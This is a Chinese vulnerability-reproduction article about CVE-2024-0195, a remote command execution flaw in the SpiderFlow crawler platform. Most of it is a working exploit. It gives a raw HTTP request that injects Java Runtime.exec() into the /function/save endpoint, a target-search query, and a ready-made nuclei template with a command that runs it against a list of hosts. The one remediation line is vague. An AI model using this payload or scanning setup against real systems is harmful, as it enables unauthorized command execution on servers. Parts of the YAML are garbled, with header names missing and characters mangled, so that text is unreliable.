免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
01
—
漏洞名称
SpiderFlow爬虫平台远程命令执行漏洞
02
—
漏洞影响
SpiderFlow爬虫平台
开源地址
https://gitee.com/ssssssss-team/spider-flow/
03
—
漏洞描述
SpiderFlow是新一代开源爬虫平台,以图形化方式定义爬虫流程,不写代码即可完成爬虫。基于springboot+layui开发的前后端不分离,也可以进行二次开发,因此收到很多人的喜欢,在gitee上有7.4K Star。该系统/function/save接口存在RCE漏洞,攻击者可以构造恶意命令远控服务器。
04
—
app="SpiderFlow"
05
—
靶场搭建
这是一个开源的java项目直接在本地IDEA中启动即可,首先下载源码
https://gitee.com/ssssssss-team/spider-flow.git
然后输入地址,点击clone
配置数据库,找到数据库脚本spiderflow.sql,在本地数据库中执行,创建数据库和表
然后修改数据库配置文件application.properties
配置一下maven之后会自动下载依赖包,然后直接运行即可
访问首页http://localhost:8088/
至此靶场搭建完毕
06
—
漏洞复现
首先注册一个dns账号http://dnslog.pw/dns/?&monitor=true,然后向靶场发送如下数据包,在靶场服务器上执行ping命令
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
dns平台收到ping请求记录
漏洞复现成功
07
—
nuclei poc
poc文件内容如下,在本地创建CVE-2024-0195.yaml文件,将内容粘贴进去即可
id: CVE-2024-0195
info:
name: SpiderFlow爬虫平台RCE漏洞
author: fgz
severity: critical
description: SpiderFlow是新一代开源爬虫平台,以图形化方式定义爬虫流程,不写代码即可完成爬虫。基于springboot+layui开发的前后端不分离,也可以进行二次开发,因此收到很多人的喜欢,在gitee上有7.4K Star。该系统/function/save接口存在RCE漏洞,攻击者可以构造恶意命令远控服务器。
metadata:
1 :
app="SpiderFlow" :
verified: true
requests:
raw:
|+
POST /function/save HTTP/1.1
Host: {{Hostname}}
zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 :
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 :
application/x-www-form-urlencoded; charset=UTF-8 :
Accept: */*
gzip, deflate :
XMLHttpRequest :
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+{{interactsh-url}}')%3B%7B
matchers:
type: dsl
dsl:
contains(interactsh_protocol, "dns")
condition: and
运行POC
nuclei.exe -t mypoc/其他/CVE-2024-0195.yaml -l data/SpiderFlow.txt
08
—
修复建议
收缩互联网攻击面。
原文始发于微信公众号(AI与网安):[漏洞复现] CVE-2024-0195
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论